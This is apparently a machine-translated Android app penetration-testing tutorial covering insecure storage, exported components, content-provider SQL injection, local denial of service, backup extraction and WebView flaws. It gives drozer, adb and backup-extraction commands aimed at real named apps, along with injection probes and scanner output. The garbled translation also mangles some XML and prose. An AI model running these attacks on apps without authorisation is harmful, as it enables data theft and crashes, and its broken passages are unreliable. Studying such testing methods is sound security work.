3.1 Data storage Vulnerability
Users will often sensitive data to the app, such as:
user name and password
authentication token
contact record
communications recording
historical usage records
.....
If they wish, app can collect users' privacy and personal information stored in plain text or transmitted in the clear, usually stored locally, does not rule uploaded to the network
• Local Save
• Save network
Saved locally
SharedPreferences •
the Data / the Data / package name /shared_prefs/*.xml
not used when creating a profile MODE_PRIVATE mode, it can cause other programs to read the configuration file, root user readable
• SQLiteDatabases
data / data / package name /database/*.db
not use MODE_PRIVATE mode when creating a database
• InternalStorage
data / data / application package name / files / *
do not use mode MODE_PRIVATE
• ExternalStorage
/mnt/sdcard/*
Further reading
Analysis http://www.droidsec.cn/android-database configuration mode security risk /
http://www.droidsec.cn/android local data storage: internal-storage Security Risk Analysis /
3.2 Components exposed vulnerabilities
1、android:exported
Four component has a property of: Android: exported
Export is true, that may be invoked externally; export if false, indicating not be invoked outside
<Activity
Android:. "PartActivity" name =
Android: Theme = "@ Android: style / Theme.Dialog "
Android: Export =" to true ">
</ Activity>
When defining the four components often do not write export this label, what is the system default export?
If the four components include intent-filter, then the Android system thinks this may be an external component by implicitly calling, so the default export is true
if the component does not contain the four intent-filter, then the Android system can only think that this is an internal component values by explicit call, so the default is false export
2, simple test
adb forward tcp:31415 tcp:31415
drozer console connect
Determine the attack surface
run app.package.attacksurface package name
to obtain activity information
run app.activity.info -a package name
to start activity
RUN app.activity.start --component package names package name .XXActivity
Bypass authentication
after being exposed to third-party call activity, may log in without a password / reset the password
Ultra vires
low-privilege program by calling the high privilege program components exposed, the implementation of high authority action
3, components of the control authority
To increase the safety of the four components, a component can define access permissions need a
<Activity
Android: name = "PartActivity."
Android: Theme = "@ Android: style / Theme.Dialog">
Android: permission = "COM. example.test.permission "
</ Activity>
<permission android:name="com.example.test.permission"
android:protectionLevel="dangerous"
android:label="test"
android:description="test_permission" />
If you need to be in AndroidManifest.xml, by applying for permission to
invoke the component's statement: <uses-permission Android: name = "com.example.test.permission" />
Android: protectionLevel, if it is Signature, and then only use this application the same private key signature applications before they can apply for this privilege.
Further reading
https://bugs.secquan.org/bugs/WooYun-2014-48501
http://www.droidsec.cn/content-provider file directory traversal vulnerability analysis /
3.3 APP SQL injection vulnerabilities
Connecting the emulator / real machine
nox_adb.exe connect 127.0.0.1:62001
Port forwarding, the port used to Drozer 31415
adb Forward tcp: tcp 31415: 31415
开启Drozer console
drozer console connect
Content Provider to obtain information
run app.provider.info -a com.qijia.o2o
Code targeting small com.qijia.o2o.provider.CityProvider
Content: //com.qijia.o2o
检测sql注入
run scanner.provider.injection -a com.qijia.o2o
Not Vulnerable:
content://com.tencent.mm.sdk.plugin.provider/sharedpref/
content://com.sina.weibo.sdkProvider/query/package
content://com.tencent.mm.sdk.comm.provider/jumpToBizProfile
content://downloads.com.qijia.o2o
content://telephony/carriers/preferapn/
content://com.tencent.mm.sdk.comm.provider/openRankList
content://com.tencent.mm.sdk.comm.provider/joinChatroom/
content://com.tencent.mm.sdk.comm.provider/createChatroom/
content://downloads./
content://com.tencent.mm.sdk.comm.provider/addCardToWX/
content://com.qijia.o2o/full/
content://com.qijia.o2o/children
content://com.qijia.o2o/children/
content://com.qijia.o2o/
content://com.sina.weibo.sdkProvider/query/package/
content://telephony/carriers/preferapn
content://com.tencent.mm.sdk.comm.provider/openBusiLuckyMoney
content://downloads.com.qijia.o2o/
content://com.tencent.mm.sdk.comm.provider/jumpToBizTempSession/
content://com.tencent.mm.sdk.comm.provider/jumpToBizProfile/
content://orm
content://com.qijia.o2o/full
content://com.tencent.mm.sdk.comm.provider/addCardToWX
content://com.tencent.mm.sdk.comm.provider/joinChatroom
content://orm/
content://com.tencent.mm.sdk.comm.provider/jumpToBizTempSession
content://com.tencent.mm.sdk.plugin.provider/sharedpref
content://com.tencent.mm.sdk.comm.provider/createChatroom
content://com.tencent.mm.sdk.comm.provider/openWebview/
content://com.qijia.o2o
content://com.tencent.mm.sdk.comm.provider/openRankList/
content://com.tencent.mm.sdk.comm.provider/openWebview
content://downloads.
content://com.tencent.mm.sdk.comm.provider/openBusiLuckyMoney/
Injection in Projection:
content://com.qijia.o2o/provinces
content://com.qijia.o2o/provinces/
Injection in Selection:
content://com.qijia.o2o/provinces
content://com.qijia.o2o/provinces/
使sql语句报错
run app.provider.query content://com.qijia.o2o/provinces --projection "'"
unrecognized token: "' FROM areas WHERE parent = ''" (code 1): , while compilin
g: SELECT ' FROM areas WHERE parent = ''
Open a web service and content provider can connect on the phone, and can also be used in combination sqlmap
run auxiliary.webcontentresolver
http://localhost:8080/query?uri=content://com.qijia.o2o/provinces&projection='
SELECT ' FROM areas WHERE parent =
http://localhost:8080/query?uri=content://com.qijia.o2o/provinces&projection=*#
SELECT ‘ FROM areas WHERE parent =
SELECT * FROM areas WHERE parent =
3.4 Local Denial of Service Vulnerability
Android Apps local denial of service vulnerability stems from the program no Intent.getXXXExtra () no exception caught when abnormal or malformed data acquisition process
An attacker intent by sending empty data anomalies or malformations application data to the victim, causing it to collapse
Local Denial of Service vulnerability can not only lead to the application of security and other protective functions are bypassed or failure (such as antivirus applications, security guards, security lock screen, etc.)
But also can be applied using a competitive side to attack, so that their application to crash, resulting in varying degrees of loss of economic benefits
Testing
to determine the attack surface
dz> run app.package.attacksurface package name
to obtain activity information
dz> run app.activity.info -a com.nineteenlou.nineteenlou
start activity
DZ> RUN app.activity.start --component com.nineteenlou.nineteenlou com.tencent.tauth.TAuthView
acquire the broadcast information components
run app.broadcast.info -a package names
transmits a null action to broadcast component
dz> run app.broadcast.send --component broadcast component package name name
Detailed analysis and repair
Android client information disclosure and denial of service vulnerability
https://bugs.secquan.org/bugs/WooYun-2015-119959
https://www.secpulse.com/archives/3859.html
3.5 allowbackup backup risk
AndroidManifest.xml configuration file to explicitly configure the android: allowBackup = true
backup
adb backup -f E: \ back.ab -noapk package name
may or may not enter a password
Use android-backup-extractor (abe) ab tool to parse the file
https://github.com/nelenkov/android-backup-extractor/releases
java -jar abe.jar unpack back.ab applock.tar
SmartLockConfig.xml
Actual case:
a root password lock is not backed up: https: //blog.csdn.net/qq_31387043/article/details/51452782
microblogging app backup: https: //blog.csdn.net/chuyouyinghe/article/details/53609806
3.6 activity hijacking
A user opens an application on the Android phone, go to the login page
this time, malicious software detects the motion of the user, a pop-up immediately with the same application interface Activity, Activity overwrite legitimate
users almost imperceptible, Next the user to enter a user name and password operation is actually performed on the Activity malware
Activity hijacking instance protective measures
http://blog.chinaunix.net/uid-29170659-id-4930737.html
3.7 webview stored in clear text, code execution, and other same-origin policy vulnerability
WebView
Now many have built-in App Web page (Hyprid App), for example, a lot of electronic business platform, Taobao, Jingdong, poly cost-effective, etc.
Function is implemented by Android's WebView
there are many loopholes in the process of using WebView, and so likely to cause dangerous leaks user data
webview-file domain origin policy
http://www.droidsec.cn/webview-file domain origin policy bypass vulnerability analysis /
WebView stored in plain text
Case: HTTPS: //bugs.secquan.org/bugs/WooYun-2013-20246
WebView enabled by default password save feature:
myWebView.setSavePassword(true)
WebView code execution
https://www.52pojie.cn/thread-322022-1-1.html
https://blog.csdn.net/u012195899/article/details/68942725
WormHole wormhole Vulnerability
https://blog.csdn.net/jltxgcy/article/details/50686858
With cloning vulnerability analysis https://blog.csdn.net/xwh_1230/article/details/79045251